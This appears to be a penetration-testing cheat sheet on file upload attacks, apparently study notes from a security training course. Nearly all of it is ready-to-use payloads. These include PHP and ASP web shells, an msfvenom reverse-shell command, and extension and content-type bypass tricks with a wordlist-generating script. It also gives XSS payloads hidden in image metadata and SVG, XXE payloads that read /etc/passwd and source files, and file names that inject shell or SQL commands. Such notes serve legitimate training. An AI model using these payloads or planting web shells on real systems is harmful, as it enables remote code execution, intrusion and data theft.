File Upload Attacks

Web Shells

Web Shell Description
<?php file_get_contents('/etc/passwd'); ?> Basic PHP File Read
<?php system('hostname'); ?> Basic PHP Command Execution
<?php system($_REQUEST['cmd']); ?> Basic PHP Web Shell
<% eval request('cmd') %> Basic ASP Web Shell
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php Generate PHP reverse shell
PHP Web Shell PHP Web Shell
PHP Reverse Shell PHP Reverse Shell
Web/Reverse Shells List of Web Shells and Reverse Shells

Extension discovery list: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt

Bypasses

Command Description
Client-Side Bypass
[CTRL+SHIFT+C] Toggle Page Inspector
Blacklist Bypass
shell.phtml Uncommon Extension
shell.pHp Case Manipulation
PHP Extensions List of PHP Extensions
ASP Extensions List of ASP Extensions
Web Extensions List of Web Extensions
Whitelist Bypass
shell.jpg.php Double Extension
shell.php.jpg Reverse Double Extension
%20, %0a, %00, %0d0a, /, .\, ., Character Injection - Before/After Extension
Content/Type Bypass
Web Content-Types List of Web Content-Types
Content-Types List of All Content-Types
File Signatures List of File Signatures/Magic Bytes

Generate Wordlists/Payloads

for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
    for ext in '.php' '.phps'; do
        echo "shell$char$ext.jpg" >> wordlist.txt
        echo "shell$ext$char.jpg" >> wordlist.txt
        echo "shell.jpg$char$ext" >> wordlist.txt
        echo "shell.jpg$ext$char" >> wordlist.txt
    done
done

Limited Uploads

Potential Attack File Types
XSS HTML, JS, SVG, GIF (see [[XSS]])
XXE/SSRF XML, SVG, PDF, PPT, DOC
DoS ZIP, JPG, PNG

XSS

XSS via Image

Another example of XSS attacks is web applications that display an image's metadata after its upload. For such web applications, we can include an XSS payload in one of the Metadata parameters that accept raw text, like the Comment or Artist parameters, as follows:

Limited File Uploads

exiftool -Comment=' "><img src=1 onerror=alert(window.origin)>' HTB.jpg
exiftool HTB.jpg
...SNIP...
Comment                         :  "><img src=1 onerror=alert(window.origin)>

We can see that the Comment parameter was updated to our XSS payload. When the image's metadata is displayed, the XSS payload should be triggered, and the JavaScript code will be executed to carry the XSS attack. Furthermore, if we change the image's MIME-Type to text/html, some web applications may show it as an HTML document instead of an image, in which case the XSS payload would be triggered even if the metadata wasn't directly displayed.

XSS via SVG

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
    <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
    <script type="text/javascript">alert(window.origin);</script>
</svg>

XXE

XXE via SVG

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>

Once the above SVG image is uploaded and viewed, the XML document would get processed, and we should get the info of (/etc/passwd) printed on the page or shown in the page source. Similarly, if the web application allows the upload of XML documents, then the same payload can carry the same attack when the XML data is displayed on the web application.

Read files/Code:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>

Other

Using XML data is not unique to SVG images, as it is also utilized by many types of documents, like PDF, Word Documents, PowerPoint Documents, among many others. All of these documents include XML data within them to specify their format and structure. Suppose a web application used a document viewer that is vulnerable to XXE and allowed uploading any of these documents. In that case, we may also modify their XML data to include the malicious XXE elements, and we would be able to carry a blind XXE attack on the back-end web server.

Injections in File Name

For example, if we name a file file$(whoami).jpg or file`whoami`.jpg or file.jpg||whoami, and then the web application attempts to move the uploaded file with an OS command (e.g. mv file /tmp), then our file name would inject the whoami command, which would get executed, leading to remote code execution. You may refer to the Command Injections module for more information. See [[Command Injections]]

We may also inject an SQL query in the file name (e.g. file';select+sleep(5);--.jpg), which may lead to an SQL injection if the file name is insecurely used in an SQL query.